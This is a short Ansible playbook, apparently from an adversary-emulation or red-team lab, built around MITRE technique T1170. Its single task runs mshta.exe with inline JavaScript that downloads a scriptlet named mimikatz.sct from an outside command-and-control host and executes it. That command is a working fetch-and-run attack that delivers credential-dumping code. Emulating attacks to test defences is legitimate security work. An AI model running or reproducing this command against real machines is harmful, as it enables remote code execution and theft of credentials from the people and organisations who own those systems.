#T1170 - Mshta
- name: MSHTA - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: download and execute
      win_command: |
        "c:\windows\system32\mshta.exe javascript:a=(GetObject('script:http://cnc-nuance.eastus.cloudapp.azure.com:443/mimikatz.sct')).Exec();close();"
      
